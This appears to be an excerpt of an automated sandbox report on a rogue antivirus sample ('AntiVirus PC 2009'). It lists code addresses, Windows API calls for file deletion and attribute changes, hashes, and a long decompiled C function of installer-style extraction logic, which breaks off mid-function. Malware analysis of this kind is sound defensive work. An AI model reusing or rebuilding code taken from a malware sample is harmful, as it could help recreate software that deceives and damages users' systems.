                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c658
                                                                                                                                                  0x0040c659
                                                                                                                                                  0x0040c661
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c663
                                                                                                                                                  0x0040c66d
                                                                                                                                                  0x0040c674
                                                                                                                                                  0x0040c679
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c727
                                                                                                                                                  0x0040c72b
                                                                                                                                                  0x0040c72d
                                                                                                                                                  0x0040c734
                                                                                                                                                  0x0040c740
                                                                                                                                                  0x0040c740
                                                                                                                                                  0x0040c746
                                                                                                                                                  0x0040c74e
                                                                                                                                                  0x0040c74e
                                                                                                                                                  0x0040c753
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c75f
                                                                                                                                                  0x0040c763
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c769
                                                                                                                                                  0x0040c58b
                                                                                                                                                  0x0040c591
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c770
                                                                                                                                                  0x0040c774
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c77a
                                                                                                                                                  0x0040c782
                                                                                                                                                  0x0040c787
                                                                                                                                                  0x0040c787
                                                                                                                                                  0x0040c78a
                                                                                                                                                  0x0040c7af
                                                                                                                                                  0x0040c78c
                                                                                                                                                  0x0040c78c
                                                                                                                                                  0x0040c78c
                                                                                                                                                  0x0040c78f
                                                                                                                                                  0x0040c7a6
                                                                                                                                                  0x0040c791
                                                                                                                                                  0x0040c791
                                                                                                                                                  0x0040c791
                                                                                                                                                  0x0040c792
                                                                                                                                                  0x0040c79d
                                                                                                                                                  0x0040c794
                                                                                                                                                  0x0040c794
                                                                                                                                                  0x0040c794
                                                                                                                                                  0x0040c792
                                                                                                                                                  0x0040c78f
                                                                                                                                                  0x0040c7bd
                                                                                                                                                  0x0040c7c4
                                                                                                                                                  0x0040c7cb
                                                                                                                                                  0x0040c7d2
                                                                                                                                                  0x0040c7d7
                                                                                                                                                  0x0040c7de
                                                                                                                                                  0x0040c828
                                                                                                                                                  0x0040c82d
                                                                                                                                                  0x0040c82f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c831
                                                                                                                                                  0x0040c833
                                                                                                                                                  0x0040c83a
                                                                                                                                                  0x0040c840
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c842
                                                                                                                                                  0x0040c842
                                                                                                                                                  0x0040c842
                                                                                                                                                  0x0040c844
                                                                                                                                                  0x0040c847
                                                                                                                                                  0x0040c84e
                                                                                                                                                  0x0040c850
                                                                                                                                                  0x0040c857
                                                                                                                                                  0x0040c85a
                                                                                                                                                  0x0040c85f
                                                                                                                                                  0x0040c861
                                                                                                                                                  0x0040c893
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c893
                                                                                                                                                  0x0040c863
                                                                                                                                                  0x0040c865
                                                                                                                                                  0x0040c868
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87d
                                                                                                                                                  0x0040c87d
                                                                                                                                                  0x0040c882
                                                                                                                                                  0x0040c883
                                                                                                                                                  0x0040c889
                                                                                                                                                  0x0040c889
                                                                                                                                                  0x0040c88a
                                                                                                                                                  0x0040c88f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c88f
                                                                                                                                                  0x0040c86a
                                                                                                                                                  0x0040c86a
                                                                                                                                                  0x0040c86d
                                                                                                                                                  0x0040c86e
                                                                                                                                                  0x0040c874
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c874
                                                                                                                                                  0x0040c849
                                                                                                                                                  0x0040c84c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c895
                                                                                                                                                  0x0040c895
                                                                                                                                                  0x0040c896
                                                                                                                                                  0x0040c896
                                                                                                                                                  0x0040c89b
                                                                                                                                                  0x0040c89d
                                                                                                                                                  0x0040c89f
                                                                                                                                                  0x0040c89f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7e0
                                                                                                                                                  0x0040c7e7
                                                                                                                                                  0x0040c7f5
                                                                                                                                                  0x0040c7fc
                                                                                                                                                  0x0040c801
                                                                                                                                                  0x0040c803
                                                                                                                                                  0x0040c809
                                                                                                                                                  0x0040c815
                                                                                                                                                  0x0040c815
                                                                                                                                                  0x0040c8a2
                                                                                                                                                  0x0040c8a2
                                                                                                                                                  0x0040c8a9
                                                                                                                                                  0x0040c8b2
                                                                                                                                                  0x0040c8b9
                                                                                                                                                  0x0040c8b9
                                                                                                                                                  0x0040c8c5
                                                                                                                                                  0x0040c8d4
                                                                                                                                                  0x0040c8db
                                                                                                                                                  0x0040c8e7
                                                                                                                                                  0x0040c8ec
                                                                                                                                                  0x0040c8f3
                                                                                                                                                  0x0040c8fc
                                                                                                                                                  0x0040c908
                                                                                                                                                  0x0040c90f
                                                                                                                                                  0x0040c90f
                                                                                                                                                  0x0040c91b
                                                                                                                                                  0x0040c922
                                                                                                                                                  0x0040c927
                                                                                                                                                  0x0040c92e
                                                                                                                                                  0x0040c934
                                                                                                                                                  0x0040c936
                                                                                                                                                  0x0040c936
                                                                                                                                                  0x0040c94a
                                                                                                                                                  0x0040c94f
                                                                                                                                                  0x0040c956
                                                                                                                                                  0x0040c95b
                                                                                                                                                  0x0040c95d
                                                                                                                                                  0x0040c96e
                                                                                                                                                  0x0040c97a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c95f
                                                                                                                                                  0x0040c965
                                                                                                                                                  0x0040c96a
                                                                                                                                                  0x0040c96c
                                                                                                                                                  0x0040c97f
                                                                                                                                                  0x0040c98a
                                                                                                                                                  0x0040c996
                                                                                                                                                  0x0040c998
                                                                                                                                                  0x0040c99a
                                                                                                                                                  0x0040c9a3
                                                                                                                                                  0x0040c9aa
                                                                                                                                                  0x0040c9ac
                                                                                                                                                  0x0040c9ae
                                                                                                                                                  0x0040c9b7
                                                                                                                                                  0x0040c9be
                                                                                                                                                  0x0040c9c0
                                                                                                                                                  0x0040c9c2
                                                                                                                                                  0x0040c9cb
                                                                                                                                                  0x0040c9d9
                                                                                                                                                  0x0040c9de
                                                                                                                                                  0x0040c9e5
                                                                                                                                                  0x0040c9e9
                                                                                                                                                  0x0040c9f7
                                                                                                                                                  0x0040c9f7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c9e5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c96c
                                                                                                                                                  0x0040c95d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c9ff
                                                                                                                                                  0x0040ca03
                                                                                                                                                  0x0040ca05
                                                                                                                                                  0x0040ca05
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c53d
                                                                                                                                                  0x0040c545
                                                                                                                                                  0x0040c54a
                                                                                                                                                  0x0040c54d
                                                                                                                                                  0x0040c573
                                                                                                                                                  0x0040c54f
                                                                                                                                                  0x0040c54f
                                                                                                                                                  0x0040c552
                                                                                                                                                  0x0040c567
                                                                                                                                                  0x0040c554
                                                                                                                                                  0x0040c554
                                                                                                                                                  0x0040c55b
                                                                                                                                                  0x0040c55b
                                                                                                                                                  0x0040c552
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bfe1
                                                                                                                                                  0x0040bfe5
                                                                                                                                                  0x0040bfea
                                                                                                                                                  0x0040bff1
                                                                                                                                                  0x0040bff1
                                                                                                                                                  0x0040bff4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bff6
                                                                                                                                                  0x0040bff6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bff6
                                                                                                                                                  0x0040bff4

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0040B5EC: ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00001000,?,00000000,?,0040BFAD,00000000,?,?,?,?,?,?,0040D289,?), ref: 0040B694
                                                                                                                                                  • lstrcmpiA.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,0040D289,?,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe), ref: 0040C00B
                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000400,?,?,0040D289,?,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,0041A818,0041A824,?), ref: 0040C04D
                                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,0040D289,?,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe), ref: 0040C0D7
                                                                                                                                                  • SHFileOperationA.SHELL32(?,?,00000000), ref: 0040C18E
                                                                                                                                                  • GetFileAttributesA.KERNEL32(?), ref: 0040C19B
                                                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040C1A9
                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 0040C2E1
                                                                                                                                                  • GetDlgItem.USER32 ref: 0040C396
                                                                                                                                                  • SetWindowTextA.USER32(00000000,00000000), ref: 0040C3A6
                                                                                                                                                  • SendMessageA.USER32(00000000,00000143,00000000,%s.%d.tmp), ref: 0040C3B5
                                                                                                                                                  • SendMessageA.USER32(00000000,00000143,00000000,00000000), ref: 0040C3DF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$AttributesMessageSendTextWindow$CurrentDeleteDirectoryEnvironmentExpandItemOperationStringslstrcmpi
                                                                                                                                                  • String ID: "$%s.%d.tmp$<br>$C:\Program Files (x86)\antiviruspc2009$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                  • API String ID: 297094968-2635522260
                                                                                                                                                  • Opcode ID: 33f7a4df254c0309be474561db60575b9f011de6869f9898e4b1b1333f387336
                                                                                                                                                  • Instruction ID: b5cb853b9bfe87da93f6a43ed2e6062897ca23f8470ad9b60567a4febf83cb58
                                                                                                                                                  • Opcode Fuzzy Hash: 33f7a4df254c0309be474561db60575b9f011de6869f9898e4b1b1333f387336
                                                                                                                                                  • Instruction Fuzzy Hash: B9E14C71901218EADB21EBA0CD84BDE77BCAB04344F1042B7AA05F21D1DB789B58CF69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                  			E004039F5(void* __ecx, void* __edx, intOrPtr _a4, char _a7, char* _a8, char _a11, intOrPtr _a12, signed int _a15) {
                                                                                                                                                  				signed int _v5;
                                                                                                                                                  				signed char* _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				char _v21;
                                                                                                                                                  				signed int _v25;
                                                                                                                                                  				char _v26;
                                                                                                                                                  				char _v1052;
                                                                                                                                                  				char _v3108;
                                                                                                                                                  				char _v4133;
                                                                                                                                                  				char _v4137;
                                                                                                                                                  				char _v4156;
                                                                                                                                                  				char _v6204;
                                                                                                                                                  				char _v7228;
                                                                                                                                                  				char _v8392;
                                                                                                                                                  				char _v8396;
                                                                                                                                                  				char _v11484;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				intOrPtr _t404;
                                                                                                                                                  				signed int _t414;
                                                                                                                                                  				signed int _t421;
                                                                                                                                                  				signed int _t424;
                                                                                                                                                  				signed int _t431;
                                                                                                                                                  				signed int _t437;
                                                                                                                                                  				char* _t441;
                                                                                                                                                  				char _t445;
                                                                                                                                                  				signed char _t450;
                                                                                                                                                  				signed int _t452;
                                                                                                                                                  				signed int _t456;
                                                                                                                                                  				signed int _t467;
                                                                                                                                                  				signed int _t471;
                                                                                                                                                  				signed int _t474;
                                                                                                                                                  				signed int _t491;
                                                                                                                                                  				intOrPtr _t501;
                                                                                                                                                  				signed int _t511;
                                                                                                                                                  				signed int _t512;
                                                                                                                                                  				signed int _t520;
                                                                                                                                                  				signed int _t523;
                                                                                                                                                  				signed int _t524;
                                                                                                                                                  				char _t527;
                                                                                                                                                  				signed int _t531;
                                                                                                                                                  				signed int _t541;
                                                                                                                                                  				signed int _t558;
                                                                                                                                                  				signed int _t559;
                                                                                                                                                  				signed int _t562;
                                                                                                                                                  				signed int _t570;
                                                                                                                                                  				signed int _t580;
                                                                                                                                                  				short* _t582;
                                                                                                                                                  				char* _t587;
                                                                                                                                                  				signed int _t591;
                                                                                                                                                  				short _t592;
                                                                                                                                                  				signed int _t597;
                                                                                                                                                  				signed int _t600;
                                                                                                                                                  				char* _t602;
                                                                                                                                                  				signed int _t604;
                                                                                                                                                  				signed int _t609;
                                                                                                                                                  				void* _t612;
                                                                                                                                                  				signed int _t621;
                                                                                                                                                  				signed int _t623;
                                                                                                                                                  				signed int _t627;
                                                                                                                                                  				intOrPtr _t628;
                                                                                                                                                  				signed int _t630;
                                                                                                                                                  				signed int _t634;
                                                                                                                                                  				intOrPtr _t640;
                                                                                                                                                  				char _t641;
                                                                                                                                                  				signed int _t653;
                                                                                                                                                  				void* _t706;
                                                                                                                                                  				signed int _t714;
                                                                                                                                                  				void* _t715;
                                                                                                                                                  				char* _t716;
                                                                                                                                                  				void* _t718;
                                                                                                                                                  
                                                                                                                                                  				_t706 = __edx;
                                                                                                                                                  				E00401200(0x2cd8);
                                                                                                                                                  				_t640 = _a4;
                                                                                                                                                  				_t716 = _a8;
                                                                                                                                                  				_t715 = __ecx;
                                                                                                                                                  				_v20 =  *((intOrPtr*)(_t640 + 0x329b));
                                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                                  					L5:
                                                                                                                                                  					_t404 =  *((intOrPtr*)(_t716 + 0x4678));
                                                                                                                                                  					_a4 = _t404;
                                                                                                                                                  					__eflags = _t404 - 0x74;
                                                                                                                                                  					if(_t404 == 0x74) {
                                                                                                                                                  						__eflags =  *((char*)(_t715 + 0x1ddf));
                                                                                                                                                  						 *((char*)(_t715 + 0x11dd)) = 0;
                                                                                                                                                  						if( *((char*)(_t715 + 0x1ddf)) != 0) {
                                                                                                                                                  							L202:
                                                                                                                                                  							return 0;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags =  *(_t640 + 0x28cc);
                                                                                                                                                  						if( *(_t640 + 0x28cc) != 0) {
                                                                                                                                                  							L24:
                                                                                                                                                  							OemToCharA(_t716 + 0x46d8, _t716 + 0x46d8);
                                                                                                                                                  							E0040A450( &_v1052, _t716 + 0x46d8);
                                                                                                                                                  							_v6204 = 0;
                                                                                                                                                  							_v21 = 0;
                                                                                                                                                  							_t414 = E00402AAA(_t640, _t716 + 0x46a8,  &_v21, 5); // executed
                                                                                                                                                  							__eflags = _t414;
                                                                                                                                                  							_a15 = _t414 != 0;
                                                                                                                                                  							__eflags = _a15;
                                                                                                                                                  							if(_a15 != 0) {
                                                                                                                                                  								__eflags = _v21;
                                                                                                                                                  								if(_v21 == 0) {
                                                                                                                                                  									 *((char*)(_t715 + 0x559)) = 0;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *(_t716 + 0x46b0) & 0x00000200;
                                                                                                                                                  							if(( *(_t716 + 0x46b0) & 0x00000200) == 0) {
                                                                                                                                                  								L29:
                                                                                                                                                  								_v5 = 0;
                                                                                                                                                  								L30:
                                                                                                                                                  								asm("sbb eax, eax");
                                                                                                                                                  								_t644 = _t715 + 0x15de;
                                                                                                                                                  								__eflags = _v5;
                                                                                                                                                  								_v16 =  ~(_v5 & 0x000000ff) & _t715 + 0x000015de;
                                                                                                                                                  								if(_v5 != 0) {
                                                                                                                                                  									E00407562(_t716, _t716 + 0x4ad8,  &_v6204);
                                                                                                                                                  									_t621 = E0040E1E9(_t644,  &_v6204,  &_v7228, 0x1000000);
                                                                                                                                                  									__eflags = _t621;
                                                                                                                                                  									if(_t621 != 0) {
                                                                                                                                                  										_t623 = E00407913( &_v7228);
                                                                                                                                                  										__eflags = _t623;
                                                                                                                                                  										if(_t623 != 0) {
                                                                                                                                                  											E0040A450( &_v1052,  &_v7228);
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								E00407463(_t715,  &_v1052,  &_v1052);
                                                                                                                                                  								_t421 = E00401BA3(_t716);
                                                                                                                                                  								__eflags = _t421;
                                                                                                                                                  								if(_t421 != 0) {
                                                                                                                                                  									L19:
                                                                                                                                                  									return 1;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags =  *(_t716 + 0x46b0) & 0x00000800;
                                                                                                                                                  								if(( *(_t716 + 0x46b0) & 0x00000800) == 0) {
                                                                                                                                                  									_t424 = E00401B91(_t716);
                                                                                                                                                  									__eflags = _t424;
                                                                                                                                                  									if(_t424 != 0) {
                                                                                                                                                  										L45:
                                                                                                                                                  										E00401BBC(_t716);
                                                                                                                                                  										 *(_t715 + 0x4ee) =  *(_t716 + 0x46b0) >> 0x00000001 & 0x00000001;
                                                                                                                                                  										 *((char*)(_t715 + 0x4ef)) = 0;
                                                                                                                                                  										asm("sbb ecx, [esi+0x5384]");
                                                                                                                                                  										_t649 = _t716;
                                                                                                                                                  										_t431 = E004054B4(_t716,  *((intOrPtr*)(_t716 + 0x6d80)) -  *(_t716 + 0x5380),  *((intOrPtr*)(_t716 + 0x6d84)), 0);
                                                                                                                                                  										__eflags = _a15;
                                                                                                                                                  										_a11 = 0;
                                                                                                                                                  										_a7 = 0;
                                                                                                                                                  										_v25 = 0;
                                                                                                                                                  										if(_a15 != 0) {
                                                                                                                                                  											L47:
                                                                                                                                                  											__eflags = _v20 - 0x49;
                                                                                                                                                  											_push(_v25);
                                                                                                                                                  											_push((_t431 & 0xffffff00 | _v20 == 0x00000049) & 0x000000ff);
                                                                                                                                                  											_push( *(_t640 + 0x29ba) & 0x000000ff);
                                                                                                                                                  											_t437 = E0040BB2F(_t649,  &_v1052,  &_v6204);
                                                                                                                                                  											__eflags = _t437;
                                                                                                                                                  											if(_t437 == 0) {
                                                                                                                                                  												goto L202;
                                                                                                                                                  											}
                                                                                                                                                  											__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                  											if(( *(_t716 + 0x46b0) & 0x00000004) == 0) {
                                                                                                                                                  												L52:
                                                                                                                                                  												_v12 = _t715 + 0x11de;
                                                                                                                                                  												E0040A450(_t715 + 0x11de, _t640 + 0x810);
                                                                                                                                                  												__eflags =  *((intOrPtr*)(_t640 + 0x28c8)) - 5;
                                                                                                                                                  												if( *((intOrPtr*)(_t640 + 0x28c8)) != 5) {
                                                                                                                                                  													L59:
                                                                                                                                                  													_a7 = 0;
                                                                                                                                                  													L56:
                                                                                                                                                  													__eflags = _v20 - 0x45;
                                                                                                                                                  													if(_v20 == 0x45) {
                                                                                                                                                  														L60:
                                                                                                                                                  														_t441 = E004073B4( &_v1052);
                                                                                                                                                  														L61:
                                                                                                                                                  														E0040A5BB(_v12, _t441);
                                                                                                                                                  														_t445 = E0040DB2A( *_v12 & 0x000000ff);
                                                                                                                                                  														__eflags = _a7;
                                                                                                                                                  														_v26 = _t445;
                                                                                                                                                  														if(_a7 != 0) {
                                                                                                                                                  															__eflags =  *((char*)(_t715 + 0x11df)) - 0x5f;
                                                                                                                                                  															if( *((char*)(_t715 + 0x11df)) == 0x5f) {
                                                                                                                                                  																_t597 = E0040728F( *((char*)(_t715 + 0x11e0)));
                                                                                                                                                  																__eflags = _t597;
                                                                                                                                                  																if(_t597 != 0) {
                                                                                                                                                  																	__eflags = _v26 - 0x41 - 0x19;
                                                                                                                                                  																	if(_v26 - 0x41 <= 0x19) {
                                                                                                                                                  																		 *((char*)(_t715 + 0x11df)) = 0x3a;
                                                                                                                                                  																	}
                                                                                                                                                  																}
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  														__eflags = _v5;
                                                                                                                                                  														if(_v5 == 0) {
                                                                                                                                                  															__eflags = 0;
                                                                                                                                                  															 *(_t715 + 0x15de) = 0;
                                                                                                                                                  															L81:
                                                                                                                                                  															__eflags = _v25;
                                                                                                                                                  															if(_v25 != 0) {
                                                                                                                                                  																L83:
                                                                                                                                                  																_a7 = 0;
                                                                                                                                                  																L84:
                                                                                                                                                  																__eflags =  *((char*)(_t640 + 0x28c4));
                                                                                                                                                  																if( *((char*)(_t640 + 0x28c4)) != 0) {
                                                                                                                                                  																	L86:
                                                                                                                                                  																	__eflags = _v20 - 0x45;
                                                                                                                                                  																	if(_v20 == 0x45) {
                                                                                                                                                  																		L88:
                                                                                                                                                  																		E00403517( &_v11484);
                                                                                                                                                  																		_push(0);
                                                                                                                                                  																		__eflags = E00406007( &_v11484, _t706, _v12, _v16,  &_v11484);
                                                                                                                                                  																		if(__eflags == 0) {
                                                                                                                                                  																			__eflags =  *((char*)(_t640 + 0x28c4));
                                                                                                                                                  																			L93:
                                                                                                                                                  																			if(__eflags == 0) {
                                                                                                                                                  																				L95:
                                                                                                                                                  																				__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                  																				if(( *(_t716 + 0x46b0) & 0x00000004) != 0) {
                                                                                                                                                  																					__eflags =  *((char*)(_t715 + 0x115c));
                                                                                                                                                  																					if( *((char*)(_t715 + 0x115c)) == 0) {
                                                                                                                                                  																						E0040321D(0x414c7c, 1);
                                                                                                                                                  																						_a7 = 0;
                                                                                                                                                  																					}
                                                                                                                                                  																				}
                                                                                                                                                  																				_t450 =  *(_t716 + 0x46c8);
                                                                                                                                                  																				__eflags = _t450 - 0x24;
                                                                                                                                                  																				if(_t450 != 0x24) {
                                                                                                                                                  																					__eflags = _t450 - 0x1d;
                                                                                                                                                  																					if(_t450 != 0x1d) {
                                                                                                                                                  																						__eflags =  *((char*)(_t716 + 0x46c9)) - 0x30;
                                                                                                                                                  																						if( *((char*)(_t716 + 0x46c9)) != 0x30) {
                                                                                                                                                  																							E0040B282(_t716 + 0x17, E004098D0(0x6c),  &_v1052);
                                                                                                                                                  																							_t718 = _t718 + 0xc;
                                                                                                                                                  																							_a7 = 0;
                                                                                                                                                  																							E0040321D(0x414c7c, 1);
                                                                                                                                                  																						}
                                                                                                                                                  																					}
                                                                                                                                                  																				}
                                                                                                                                                  																				_t652 =  &_v4156;
                                                                                                                                                  																				E00404E8A( &_v4156);
                                                                                                                                                  																				_push( *(_t716 + 0x46cc));
                                                                                                                                                  																				_t452 = E00403218();
                                                                                                                                                  																				__eflags = _t452;
                                                                                                                                                  																				if(_t452 != 0) {
                                                                                                                                                  																					L138:
                                                                                                                                                  																					__eflags = _a7;
                                                                                                                                                  																					if(_a7 != 0) {
                                                                                                                                                  																						goto L143;
                                                                                                                                                  																					}
                                                                                                                                                  																					goto L139;
                                                                                                                                                  																				} else {
                                                                                                                                                  																					_t652 = _t716;
                                                                                                                                                  																					_t523 = E00401B91(_t716);
                                                                                                                                                  																					__eflags = _t523;
                                                                                                                                                  																					if(_t523 == 0) {
                                                                                                                                                  																						_t524 =  *(_t640 + 0x29ba);
                                                                                                                                                  																						__eflags = _t524;
                                                                                                                                                  																						if(_t524 != 0) {
                                                                                                                                                  																							__eflags = _a7;
                                                                                                                                                  																							if(_a7 != 0) {
                                                                                                                                                  																								_a11 = 1;
                                                                                                                                                  																							}
                                                                                                                                                  																						}
                                                                                                                                                  																						__eflags = _v20 - 0x45;
                                                                                                                                                  																						if(_v20 == 0x45) {
                                                                                                                                                  																							L130:
                                                                                                                                                  																							__eflags = _a7;
                                                                                                                                                  																							if(_a7 == 0) {
                                                                                                                                                  																								L139:
                                                                                                                                                  																								__eflags =  *((char*)(_t716 + 0x6d89));
                                                                                                                                                  																								if( *((char*)(_t716 + 0x6d89)) == 0) {
                                                                                                                                                  																									__eflags = _a7;
                                                                                                                                                  																									if(_a7 == 0) {
                                                                                                                                                  																										L195:
                                                                                                                                                  																										E0040503B(_t640,  &_v4156);
                                                                                                                                                  																										__eflags = _a15;
                                                                                                                                                  																										if(_a15 != 0) {
                                                                                                                                                  																											_t394 = _t715 + 0x554;
                                                                                                                                                  																											 *_t394 =  *(_t715 + 0x554) + 1;
                                                                                                                                                  																											__eflags =  *_t394;
                                                                                                                                                  																										}
                                                                                                                                                  																										L197:
                                                                                                                                                  																										__eflags =  *((char*)(_t715 + 0x4ef));
                                                                                                                                                  																										if( *((char*)(_t715 + 0x4ef)) != 0) {
                                                                                                                                                  																											goto L202;
                                                                                                                                                  																										}
                                                                                                                                                  																										__eflags =  *((intOrPtr*)(_t716 + 4)) - 0xffffffff;
                                                                                                                                                  																										if( *((intOrPtr*)(_t716 + 4)) == 0xffffffff) {
                                                                                                                                                  																											goto L202;
                                                                                                                                                  																										}
                                                                                                                                                  																										__eflags = _a7;
                                                                                                                                                  																										if(_a7 != 0) {
                                                                                                                                                  																											goto L19;
                                                                                                                                                  																										}
                                                                                                                                                  																										__eflags =  *((char*)(_t716 + 0x6d89));
                                                                                                                                                  																										if( *((char*)(_t716 + 0x6d89)) == 0) {
                                                                                                                                                  																											L18:
                                                                                                                                                  																											E00401264(_t716);
                                                                                                                                                  																											goto L19;
                                                                                                                                                  																										}
                                                                                                                                                  																										__eflags = _v25;
                                                                                                                                                  																										if(_v25 != 0) {
                                                                                                                                                  																											goto L19;
                                                                                                                                                  																										}
                                                                                                                                                  																										goto L202;
                                                                                                                                                  																									}
                                                                                                                                                  																									L143:
                                                                                                                                                  																									__eflags = _v25;
                                                                                                                                                  																									if(_v25 == 0) {
                                                                                                                                                  																										__eflags = _a11;
                                                                                                                                                  																										if(_a11 == 0) {
                                                                                                                                                  																											__eflags = _v20 - 0x50;
                                                                                                                                                  																											if(_v20 != 0x50) {
                                                                                                                                                  																												_t512 = E00405018( &_v4156);
                                                                                                                                                  																												__eflags = _t512;
                                                                                                                                                  																												if(_t512 != 0) {
                                                                                                                                                  																													E0040B282(_t716 + 0x17, E004098D0(0x406), _v12);
                                                                                                                                                  																													_t718 = _t718 + 0xc;
                                                                                                                                                  																													E00403432(0x414c7c, _t716 + 0x17, _v12);
                                                                                                                                                  																												}
                                                                                                                                                  																											}
                                                                                                                                                  																										}
                                                                                                                                                  																										_t273 = _t715 + 0x54c;
                                                                                                                                                  																										 *_t273 =  *(_t715 + 0x54c) + 1;
                                                                                                                                                  																										__eflags =  *_t273;
                                                                                                                                                  																									}
                                                                                                                                                  																									L149:
                                                                                                                                                  																									 *((intOrPtr*)(_t715 + 0x550)) =  *((intOrPtr*)(_t715 + 0x550)) + 1;
                                                                                                                                                  																									_t653 = 0;
                                                                                                                                                  																									 *((intOrPtr*)(_t715 + 0x510)) = 0;
                                                                                                                                                  																									 *((intOrPtr*)(_t715 + 0x514)) = 0;
                                                                                                                                                  																									 *((intOrPtr*)(_t715 + 0x518)) = 0;
                                                                                                                                                  																									 *((intOrPtr*)(_t715 + 0x51c)) = 0;
                                                                                                                                                  																									__eflags =  *(_t716 + 0x6d88);
                                                                                                                                                  																									 *(_t715 + 0x538) =  *(_t715 + 0x538) | 0xffffffff;
                                                                                                                                                  																									 *((intOrPtr*)(_t715 + 0x534)) = (0 |  *(_t716 + 0x6d88) != 0x00000000) - 1;
                                                                                                                                                  																									_t456 =  *(_t716 + 0x46b0) & 0x0000ffff;
                                                                                                                                                  																									__eflags = _t456 & 0x00000004;
                                                                                                                                                  																									if((_t456 & 0x00000004) != 0) {
                                                                                                                                                  																										_t653 =  *(_t716 + 0x46c8) & 0x000000ff;
                                                                                                                                                  																									}
                                                                                                                                                  																									__eflags =  *(_t716 + 0x46c8) - 0x24;
                                                                                                                                                  																									asm("sbb dl, dl");
                                                                                                                                                  																									asm("sbb eax, eax");
                                                                                                                                                  																									E00408FEC(_t715 + 0x28, _t653, _t715 + 0x115c,  ~(_t456 & 0x400) & _t716 + 0x000052e4, 0, _t706 + 0x00000001 & 0x000000ff);
                                                                                                                                                  																									 *(_t715 + 0x48) =  *(_t716 + 0x5380);
                                                                                                                                                  																									 *(_t715 + 0x4c) =  *(_t716 + 0x5384);
                                                                                                                                                  																									E00408FCC(_t715 + 0x28, _t716,  &_v4156);
                                                                                                                                                  																									_t467 = _a11;
                                                                                                                                                  																									 *(_t715 + 0x51) = _t467;
                                                                                                                                                  																									 *((char*)(_t715 + 0x52)) = _v25;
                                                                                                                                                  																									__eflags = _t467;
                                                                                                                                                  																									if(_t467 != 0) {
                                                                                                                                                  																										L163:
